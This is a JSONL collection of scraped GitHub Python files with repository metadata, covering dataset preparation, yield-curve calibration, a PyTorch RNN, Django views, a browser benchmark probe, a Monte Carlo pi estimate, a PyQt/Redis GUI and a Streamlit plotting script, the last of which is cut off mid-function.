+{"seq_id": "25043543509", "text": "import language_models as lm\n\nimport argparse\nimport glob\nimport json\nimport jsonlines\nimport os\nimport tqdm\nimport transformers\n\n\ndef _read_raw_examples(input_dir):\n\traw_examples = []\n\tpattern = os.path.join(input_dir, \"*/question.txt\")\n\tfor question_path in tqdm.tqdm(glob.glob(pattern)):\n\t\twith open(question_path, 'r') as fin:\n\t\t\tquestion = fin.read()\n\n\t\tinput_output_path = question_path.replace(\n\t\t\t\"question.txt\", \"input_output.json\")\n\t\twith open(input_output_path, 'r') as fin:\n\t\t\tinput_output = json.load(fin)\n\n\t\tmetadata_path = question_path.replace(\n\t\t\t\"question.txt\", \"metadata.json\")\n\t\twith open(metadata_path, 'r') as fin:\n\t\t\tmetadata = json.load(fin)\n\n\t\tsolutions_path = question_path.replace(\n\t\t\t\"question.txt\", \"solutions.json\")\n\t\tsolutions = []\n\t\tif os.path.exists(solutions_path):\n\t\t\twith open(solutions_path, 'r') as fin:\n\t\t\t\tsolutions = json.load(fin)\n\n\t\tstarter_code_path = question_path.replace(\n\t\t\t\"question.txt\", \"starter_code.py\")\n\t\tstarter_code = \"\"\n\t\tif os.path.exists(starter_code_path):\n\t\t\twith open(starter_code_path, 'r') as fin:\n\t\t\t\tstarter_code = fin.read()\t\n\n\t\traw_examples.append({\n\t\t\t\"question\": question,\n\t\t\t\"starter_code\": starter_code,\n\t\t\t\"metadata\": metadata,\n\t\t\t\"solutions\": solutions,\n\t\t\t\"input_output\": input_output})\n\n\treturn raw_examples\n\n\ndef _extract_raw_prompt_fn(x):\n\traw_prompt = x[\"question\"]\n\tif x[\"starter_code\"]:\n\t\traw_prompt += \"\\n\" + x[\"starter_code\"] \n\n\tif \"fn_name\" in x[\"input_output\"].keys():\n\t\traw_prompt += \"\\nUse Call-Based format\"\n\telse:\n\t\traw_prompt += \"\\nUse Standard Input format\"\n\treturn raw_prompt\n\n\ndef prepare_dataset(raw_examples, tokenizer=None, verbose=True):\n\texamples, _ = lm.dataset_utils.prepare_dataset(\n\t\traw_examples,\n\t\tprompt_prefix=\"\\nQUESTION:\\n\",\n\t\tprompt_suffix=\"\\nANSWER:\\n\",\n\t\textract_raw_prompt_fn=_extract_raw_prompt_fn,\n\t\textract_raw_completion_fn=None,\n\t\ttokenizer=tokenizer,\n\t\tstrip_whitespace=False,\n\t\tkeep_input_data=True,\n\t\tverbose=verbose)\n\treturn examples\n\n\ndef main(args):\n\ttokenizer = transformers.GPT2Tokenizer.from_pretrained(\n\t\targs.tokenizer_dir)\n\n\traw_examples = _read_raw_examples(args.input_dir)\n\texamples = prepare_dataset(\n\t\traw_examples, tokenizer=tokenizer)\n\twith jsonlines.open(args.output_file, \"w\") as fout:\n\t\tfout.write_all(examples)\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"Prepare the APPS dataset for generation.\")\n\tparser.add_argument(\"--input_dir\",\n\t\ttype=str, required=True,\n\t\thelp=\"Path to the directory storing the APPS train or test split.\")\n\tparser.add_argument(\"--tokenizer_dir\", default=\"gpt2\", type=str)\n\tparser.add_argument(\"--output_file\", default=\"\", type=str,\n\t\thelp=\"Path to store the output file.\")\n\targs = parser.parse_args()\n\tmain(args)\n", "repo_name": "hacobe/language_models", "sub_path": "examples/prepare_apps_dataset.py", "file_name": "prepare_apps_dataset.py", "file_ext": "py", "file_size_in_byte": 2712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 15, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 15, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "language_models.dataset_utils.prepare_dataset", "line_number": 66, "usage_type": "call"}, {"api_name": "language_models.dataset_utils", "line_number": 66, "usage_type": "attribute"}, {"api_name": "transformers.GPT2Tokenizer.from_pretrained", "line_number": 80, "usage_type": "call"}, {"api_name": "transformers.GPT2Tokenizer", "line_number": 80, "usage_type": "attribute"}, {"api_name": "jsonlines.open", "line_number": 86, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "31349796632", "text": "import datetime as dt\r\nimport numpy as np\r\n# import pandas as pd\r\nimport scipy.linalg as scipylin\r\nimport scipy.optimize as opt\r\nimport data_downloader as dd\r\nimport term_structure as ts\r\nimport gaussian_affine as ga\r\nimport pykalman as pk\r\n\r\n# import kalman_filter as kf\r\n\r\nRANDOM_SEED = 1\r\nTENOR_LST = [0.25, 0.5, 1, 2, 4, 7, 10]\r\n\r\n\r\nclass KWCalibrator(object):\r\n n_runs = 0\r\n\r\n def __init__(self, sample_start, sample_end):\r\n self.__train_target = dd.fetch_yld_data(TENOR_LST, sample_start, sample_end).values\r\n\r\n @property\r\n def train_target(self):\r\n return self.__train_target\r\n\r\n def objective(self, x0):\r\n kappa11, kappa21, kappa22, \\\r\n kappa31, kappa32, kappa33, \\\r\n sigma11, sigma22, sigma33, \\\r\n a0, \\\r\n lambda_a1, lambda_a2, lambda_a3, \\\r\n lambda_b11, lambda_b12, lambda_b13, \\\r\n lambda_b21, lambda_b22, lambda_b23, \\\r\n lambda_b31, lambda_b32, lambda_b33 = x0\r\n\r\n param_dict = ts.Parameters({\r\n 'theta': np.zeros(3),\r\n 'a0': a0,\r\n 'b0': np.array([1, 1, 1]),\r\n 'kappa': np.array([[kappa11, 0, 0],\r\n [kappa21, kappa22, 0],\r\n [kappa31, kappa32, kappa33]]),\r\n 'sigma': np.diag([sigma11, sigma22, sigma33]),\r\n 'lambda_a': np.array([lambda_a1, lambda_a2, lambda_a3]),\r\n 'lambda_b': np.array([[lambda_b11, lambda_b12, lambda_b13],\r\n [lambda_b21, lambda_b22, lambda_b23],\r\n [lambda_b31, lambda_b32, lambda_b33]])\r\n })\r\n\r\n ga_obj = ga.GaussianAffine(**param_dict)\r\n\r\n exp_k_dt = scipylin.expm(-ga_obj.params.kappa / 252.)\r\n F0 = np.dot(np.identity(len(ga_obj.params.theta)) - exp_k_dt, ga_obj.params.theta)\r\n F1 = exp_k_dt\r\n H0 = np.array([ga_obj.get_at(t) for t in TENOR_LST])\r\n H1 = np.array([ga_obj.get_bt(t) for t in TENOR_LST])\r\n Q = ga_obj.get_factor_cov(1. / 252)\r\n\r\n kf_obj = pk.KalmanFilter(transition_offsets=F0, transition_matrices=F1, transition_covariance=Q,\r\n observation_offsets=H0, observation_matrices=H1, random_state=RANDOM_SEED)\r\n\r\n # kf_obj = kf.KalmanFilter(F0=F0, F1=F1, Q=Q, H0=H0, H1=H1, R=R)\r\n\r\n kf_obj.em(X=self.__train_target, em_vars=['initial_state_mean', 'initial_state_covariance',\r\n 'observation_covariance'])\r\n logll = kf_obj.loglikelihood(X=self.__train_target)\r\n\r\n self.n_runs += 1\r\n\r\n print(self.n_runs, logll / len(self.train_target))\r\n\r\n return -logll / len(self.train_target)\r\n\r\n def optimize(self, x0):\r\n # opt_result = opt.fmin(self.objective, x0, disp=True)\r\n opt_result = opt.minimize(self.objective, x0, method='Nelder-Mead', options={'disp': True})\r\n\r\n for k, v in opt_result.items():\r\n print('{}: {}'.format(k, v))\r\n\r\n return opt_result\r\n\r\n\r\nif __name__ == '__main__':\r\n start_date = dt.date(1960, 1, 1)\r\n end_date = dt.date(1969, 12, 31)\r\n\r\n calib_obj = KWCalibrator(start_date, end_date)\r\n\r\n calib_obj.optimize([0.0539, -0.1486, 0.4841,\r\n 0, -6.1308, 2.1521,\r\n 0.0023, 0.0021, 0.0062,\r\n 0.0486,\r\n -0.7828, -0.6960, -1.8420,\r\n 70.2173913, -362.08695652, 129.30434783,\r\n -122.0952381, -432.42857143, 137.57142857,\r\n -208.61290323, -162.43548387, 66.48387097])\r\n\r\n \"\"\"\r\n sigma = np.array([[0.01, 0, 0],\r\n [-0.007526, 0.01, 0],\r\n [-0.044450, -0.009597, 0.01]])\r\n sigma_lambda = np.array([[-0.6953, 0.0339, -0.809],\r\n [2.1331, -0.1447, 0.6],\r\n [3.0734, -0.3576, 0.1553]])\r\n lambda_mat = np.matmul(np.linalg.inv(sigma), sigma_lambda)\r\n print(lambda_mat)\r\n\r\n calib_obj.optimize(np.array([0.8550, 0.1343, 1.4504,\r\n -0.007526, -0.044450, -0.009597,\r\n 0.0474, 3.6695, 0.8844, 0.7169,\r\n 0.3241, -0.4335, -1.2754,\r\n -69.53, 3.39, -80.9,\r\n 160.981722, -11.918686, -0.88534,\r\n 152.7733086, -32.12981295, -344.9201608]))\r\n \"\"\"\r\n", "repo_name": "yigao1983/TermPremium", "sub_path": "kw_calibrator.py", "file_name": "kw_calibrator.py", "file_ext": "py", "file_size_in_byte": 4472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data_downloader.fetch_yld_data", "line_number": 21, "usage_type": "call"}, {"api_name": "term_structure.Parameters", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "gaussian_affine.GaussianAffine", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.linalg.expm", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 53, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "pykalman.KalmanFilter", "line_number": 60, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 77, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "75394387048", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nclass RNNModel(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, vocab_size, embedding_dim, hidden_dim,\n output_dim, n_layers, bidirectional, dropout, pad_idx, use_gru=True):\n super().__init__()\n self.n_hidden = hidden_dim\n self.n_layers = n_layers\n self.use_gru = use_gru\n if bidirectional:\n self.direction = 2\n else:\n self.direction = 1\n\n self.embedding = nn.Embedding(vocab_size, embedding_dim, padding_idx=pad_idx)\n if use_gru:\n self.rnn = nn.GRU(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=0 if n_layers < 2 else dropout,\n batch_first=True)\n else:\n self.rnn = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=0 if n_layers < 2 else dropout,\n batch_first=True)\n\n self.fc = nn.Linear(hidden_dim * self.direction, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, text, text_lengths):\n embedded_text = self.dropout(self.embedding(text))\n # print(f\"embedded_text {embedded_text.shape}\")\n packed_embedded = pack_padded_sequence(embedded_text, text_lengths, batch_first=True)\n packed_output, hidden = self.rnn(packed_embedded)\n # output, output_lengths = pad_packed_sequence(packed_output)\n\n if self.use_gru:\n x = self.dropout(torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1))\n else:\n hn, cn = hidden\n x = self.dropout(torch.cat((hn[-2, :, :], hn[-1, :, :]), dim=1))\n #print(f\"x.shape {x.shape}\")\n x = self.fc(x.squeeze(0))\n # print(f\"x.shape {x.shape} {x}\")\n return x\n", "repo_name": "hietalajulius/word-2-vec-nlp", "sub_path": "model/gru.py", "file_name": "gru.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "70018800167", "text": "from django.shortcuts import render, redirect\n\n# Create your views here.\nfrom expenses_tracker2.expenses.models import Expense\nfrom expenses_tracker2.profiles.forms import CreateProfileForm\nfrom expenses_tracker2.profiles.views import get_profile\n\n\ndef index(request):\n profile = get_profile()\n expenses = Expense.objects.all()\n\n if request.method == 'POST':\n form = CreateProfileForm(request.POST, request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('index')\n\n else:\n\n form = CreateProfileForm()\n\n context = {\n 'form': form,\n 'expenses': expenses,\n 'profile': profile,\n }\n\n if profile:\n total_expenses_price = sum([x.price for x in expenses])\n budget_left = total_expenses_price - profile.budget\n context['budget_left'] = budget_left\n\n return render(request, 'home-with-profile.html', context)\n\n return render(request, 'home-no-profile.html', context)\n\n", "repo_name": "kaloyan03/Softuni-Python", "sub_path": "Python Web Basics/exam_prep/expenses_tracker2/expenses_tracker2/home_page/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "expenses_tracker2.profiles.views.get_profile", "line_number": 10, "usage_type": "call"}, {"api_name": "expenses_tracker2.expenses.models.Expense.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "expenses_tracker2.expenses.models.Expense.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "expenses_tracker2.expenses.models.Expense", "line_number": 11, "usage_type": "name"}, {"api_name": "expenses_tracker2.profiles.forms.CreateProfileForm", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "expenses_tracker2.profiles.forms.CreateProfileForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "34090817863", "text": "from __future__ import annotations\n\nimport datetime as dt\nimport time\nimport logging\nimport pathlib\nimport threading\nfrom typing import TYPE_CHECKING, Sequence\n\nfrom crossbench.probes import probe\nfrom crossbench.probes.results import LocalProbeResult, ProbeResult\n\nif TYPE_CHECKING:\n from crossbench.browsers.browser import Browser\n from crossbench.env import HostEnvironment\n from crossbench import plt\n from crossbench.runner.run import Run\n\n\nclass SystemStatsProbe(probe.Probe):\n \"\"\"\n General-purpose probe to periodically collect system-wide CPU and memory\n stats on unix systems.\n \"\"\"\n NAME = \"system.stats\"\n CMD = (\"ps\", \"-a\", \"-e\", \"-o\", \"pcpu,pmem,args\", \"-r\")\n\n _interval: float\n\n def __init__(self, interval: float = 0.1) -> None:\n super().__init__()\n self._interval = interval\n\n @property\n def interval(self) -> float:\n return self._interval\n\n def is_compatible(self, browser: Browser) -> bool:\n return not browser.platform.is_remote and (browser.platform.is_linux or\n browser.platform.is_macos)\n\n def pre_check(self, env: HostEnvironment) -> None:\n super().pre_check(env)\n if env.runner.repetitions != 1:\n env.handle_warning(f\"Probe={self.NAME} cannot merge data over multiple \"\n f\"repetitions={env.runner.repetitions}.\")\n\n\n def get_scope(self, run: Run) -> SystemStatsProbeScope:\n return SystemStatsProbeScope(self, run)\n\n\nclass SystemStatsProbeScope(probe.ProbeScope[SystemStatsProbe]):\n _poller: CMDPoller\n\n def setup(self, run: Run) -> None:\n self.result_path.mkdir()\n\n def start(self, run: Run) -> None:\n self._poller = CMDPoller(self.browser_platform, self.probe.CMD,\n self.probe.interval, self.result_path)\n self._poller.start()\n\n def stop(self, run: Run) -> None:\n self._poller.stop()\n\n def tear_down(self, run: Run) -> ProbeResult:\n return LocalProbeResult(file=(self.result_path,))\n\n\nclass CMDPoller(threading.Thread):\n\n def __init__(self, platform: plt.Platform, cmd: Sequence[str],\n interval: float, path: pathlib.Path):\n super().__init__()\n self._platform = platform\n self._cmd = cmd\n self._path = path\n if interval < 0.1:\n raise ValueError(\"Poller interval should be more than 0.1s for accuracy, \"\n f\"but got {interval}s\")\n self._interval = interval\n self._event = threading.Event()\n\n def stop(self) -> None:\n self._event.set()\n self.join()\n\n def run(self) -> None:\n start_time = time.monotonic_ns()\n while not self._event.is_set():\n poll_start = dt.datetime.now()\n\n data = self._platform.sh_stdout(*self._cmd)\n datetime_str = poll_start.strftime(\"%Y-%m-%d_%H%M%S_%f\")\n out_file = self._path / f\"{datetime_str}.txt\"\n with out_file.open(\"w\", encoding=\"utf-8\") as f:\n f.write(data)\n\n poll_end = dt.datetime.now()\n diff = (poll_end - poll_start).total_seconds()\n if diff > self._interval:\n logging.warning(\"Poller command took longer than expected %fs: %s\",\n self._interval, self._cmd)\n\n # Calculate wait_time against fixed start time to avoid drifting.\n total_time = ((time.monotonic_ns() - start_time) / 10.0**9)\n wait_time = self._interval - (total_time % self._interval)\n self._event.wait(wait_time)\n", "repo_name": "iridium-browser/iridium-browser", "sub_path": "third_party/crossbench/crossbench/probes/system_stats.py", "file_name": "system_stats.py", "file_ext": "py", "file_size_in_byte": 3363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 314, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 13, "usage_type": "name"}, {"api_name": "crossbench.probes.probe.Probe", "line_number": 20, "usage_type": "attribute"}, {"api_name": "crossbench.probes.probe", "line_number": 20, "usage_type": "name"}, {"api_name": "crossbench.browsers.browser.Browser", "line_number": 38, "usage_type": "name"}, {"api_name": "crossbench.env.HostEnvironment", "line_number": 42, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 49, "usage_type": "name"}, {"api_name": "crossbench.probes.probe.ProbeScope", "line_number": 53, "usage_type": "attribute"}, {"api_name": "crossbench.probes.probe", "line_number": 53, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 56, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 59, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 64, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 67, "usage_type": "name"}, {"api_name": "crossbench.probes.results.LocalProbeResult", "line_number": 68, "usage_type": "call"}, {"api_name": "crossbench.probes.results.ProbeResult", "line_number": 67, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 71, "usage_type": "attribute"}, {"api_name": "crossbench.plt.Platform", "line_number": 73, "usage_type": "attribute"}, {"api_name": "crossbench.plt", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 73, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 83, "usage_type": "call"}, {"api_name": "time.monotonic_ns", "line_number": 90, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 103, "usage_type": "call"}, {"api_name": "time.monotonic_ns", "line_number": 107, "usage_type": "call"}]}
+{"seq_id": "17806515454", "text": "from multiprocessing import Pool\r\nfrom multiprocessing import cpu_count\r\nimport random\r\nimport time\r\nimport math\r\n\r\n\r\ndef inside_circle(coordinate):\r\n x, y = coordinate\r\n return x**2 + y**2 < 1\r\n\r\nif __name__ == '__main__':\r\n faixa = [20, 50, 100, 1000, 25000, 50000, 100000, 500000, 1000000]\r\n times = []\r\n\r\n for k in range(len(faixa)):\r\n start = time.time()\r\n \r\n n = faixa[k]\r\n acertos = 0\r\n\r\n x = [random.random() for i in range(n)]\r\n y = [random.random() for i in range(n)]\r\n\r\n num_processadores = cpu_count()\r\n\r\n # cria um objeto Pool do módulo multiprocessing e define o número\r\n # de processos paralelos que serão utilizados para executar as tarefas\r\n with Pool(num_processadores) as p:\r\n z = p.map(inside_circle, zip(x, y)) # aplica a função a cada elemento\r\n\r\n acertos = sum(z)\r\n aprox_pi = 4 * acertos / n\r\n erro = math.pi - aprox_pi\r\n\r\n end = time.time()\r\n\r\n times.append(end - start)\r\n\r\n print('-it:', k)\r\n print('n =', n)\r\n print(\"Numero de processadores disponiveis:\", num_processadores)\r\n print(\"Aproximacao: \", aprox_pi)\r\n print(\"Erro: \", erro)\r\n print(\"Tempo de execucao: \", end - start, \"\\n\")", "repo_name": "rad-silva/compute_pi", "sub_path": "montecarlo/multiprocessamento_pi.py", "file_name": "multiprocessamento_pi.py", "file_ext": "py", "file_size_in_byte": 1188, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "random.random", "line_number": 22, "usage_type": "call"}, {"api_name": "random.random", "line_number": 23, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 25, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 29, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 34, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "22519349771", "text": "import sys\nimport redis\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nfrom PyQt5.QtGui import *\n\n\nclass App(QWidget):\n\t\n\tdef __init__(self, redis_client):\n\t\tself.redis_client = redis_client\n\t\tsuper(QWidget, self).__init__()\n\t\tself.initUI()\n\n\tdef initUI(self):\n\n\t\tself.setWindowTitle('Data Recorder')\n\t\tself.resize(200, 200)\n\n\t\tstartBtn = QPushButton('Start', self)\n\t\tstopBtn = QPushButton('Stop', self)\n\t\tquitBtn = QPushButton('Quit', self)\n\t\tnameBtn = QPushButton('Enter Filename', self)\n\n\t\tstopBtn.move(80,0)\n\t\tquitBtn.move(0, 40)\n\t\tnameBtn.move(0, 80)\n\n\t\tstartBtn.clicked.connect(self.on_click_Start)\n\t\tstopBtn.clicked.connect(self.on_click_Stop)\n\t\tquitBtn.clicked.connect(self.on_click_Quit)\n\t\tnameBtn.clicked.connect(self.on_click_Name)\n\n\t\tself.show()\n\n\t@pyqtSlot()\n\tdef on_click_Start(self):\n\t\tprint('start')\n\t\tself.redis_client.rpush('sensor', 'START')\n\tdef on_click_Stop(self):\n\t\tprint('stop')\n\t\tself.redis_client.rpush('sensor', 'STOP')\n\tdef on_click_Quit(self):\n\t\tprint('quit')\n\t\tself.redis_client.rpush('sensor', 'QUIT')\n\tdef on_click_Name(self):\n\t\tprint('name')\n\t\tself.redis_client.rpush('sensor', 'NAME')\n\n\n\nif __name__ == '__main__':\n\tredis_client = redis.StrictRedis(host='localhost', port=6379)\n\tapp = QApplication(sys.argv)\n\n\tex = App(redis_client)\n\tsys.exit(app.exec_())\n", "repo_name": "Raquelometer/masters_thesis", "sub_path": "record_data_UI.py", "file_name": "record_data_UI.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 13, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 37, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "16826691026", "text": "from django.shortcuts import render\nimport math\n\nfrom savings.models import Goal\n# Create your views here.\ndef fvapmt(fv,r,t):\n return ((fv*r)/((1+r)**t-1))\n\ndef savings(request):\n context = {}\n user = request.user\n goals = Goal.objects.all().filter(user__username__contains=user.username)\n payments = []\n data = []\n for g in goals:\n fv = g.amount\n r = (g.rate/100)\n t = g.time\n answer = fvapmt(fv,r,t)\n formatted = str(round(answer, 2))\n payments.append(formatted)\n data.append([g,formatted])\n\n context = {'goals':goals, 'payments':payments, 'data':data}\n return render(request, 'savings/index.html', context)\n\ndef goalSettingPage(request):\n return render(request, 'savings/setGoal.html')\n\ndef setNewGoal(request):\n context = {}\n form = Goal()\n if request.method == \"POST\":\n form = Goal(request.POST)\n goalname = request.POST.get('goalname')\n amount = request.POST.get('amount')\n time = request.POST.get('time')\n rate = request.POST.get('rate')\n form = Goal(user=request.user, goalname=goalname, amount=amount, time=time, rate=rate)\n form.save()\n context = {'form': form}\n return savings(request)\n return savings(request)", "repo_name": "EngandDeveloper/uofthacks8", "sub_path": "finance/savings/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "savings.models.Goal.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "savings.models.Goal.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "savings.models.Goal", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "savings.models.Goal", "line_number": 32, "usage_type": "call"}, {"api_name": "savings.models.Goal", "line_number": 34, "usage_type": "call"}, {"api_name": "savings.models.Goal", "line_number": 39, "usage_type": "call"}, {"api_name": "savings.models", "line_number": 42, "usage_type": "call"}, {"api_name": "savings.models", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "75112731368", "text": "import pandas as pd\nimport plotly_express as px\nimport folium\nfrom folium import Choropleth, Circle, Marker, Icon, map\nfrom streamlit_folium import folium_static\nfrom keplergl import KeplerGl\nfrom streamlit_keplergl import keplergl_static\nimport streamlit as st\ndef load_data():\n df = pd.read_csv(\"data/macroalgae_final.csv\", index_col=0)\n df = df.drop([\"kingdom\", \"class\", \"genus\", \"new\"], axis = 1)\n df.dropna(inplace=True)\n return df.drop_duplicates([\"lon\", \"lat\"])\n\ndef family_list():\n data = load_data()\n return list(data[\"family\"].unique())\n\ndef lista_especies():\n data = load_data()\n return list(data[\"species\"].unique())\n\n\ndef pie_chart_family():\n df = load_data()\n df2 = df.groupby(\"family\")[\"family\"].agg([\"count\"]).reset_index()\n fig = px.pie(df2, values = \"count\", names = \"family\", title = \"number of families on the dataframe\")\n fig.update_traces(textposition='inside') # para poner los % dentro del quesito\n\n fig.update_layout(uniformtext_minsize=15, uniformtext_mode='hide')\n\n return fig\n\n\ndef pie_chart_genus(familia):\n df = load_data()\n df = df[df[\"family\"]== f'{familia}']\n df2 = df.groupby(\"country\")[\"country\"].agg([\"count\"]).reset_index()\n\n fig = px.pie(df2, values = \"count\", names = \"country\", title = \"number of genus on the dataframe\")\n \n fig.update_traces(textposition='inside') # para poner los % dentro del quesito\n\n fig.update_layout(uniformtext_minsize=15, uniformtext_mode='hide')\n\n return fig\n\n\ndef plots_year (df, x_axis):\n \"\"\"\n Function to create a plot to represent the evolution of data through the years\n Args: \n df: dataframe\n x_axis: target species that you are interested in \n Returns:\n A plotly line plot\n \"\"\"\n df = df.groupby(['species', 'year'])['year'].agg(['count']).reset_index()\n df = df[df[\"species\"]== f\"{x_axis}\"]\n return px.line(df, x='year', y = \"count\", title = \"Number of species per year\")\n\ndef plots_month(df, x_axis):\n \"\"\"\n Function to create a plot to represent the evolution of data through the months\n Args: \n df: dataframe\n x_axis: target species that you are interested in \n Returns:\n A plotly bar plot\n \"\"\"\n df = 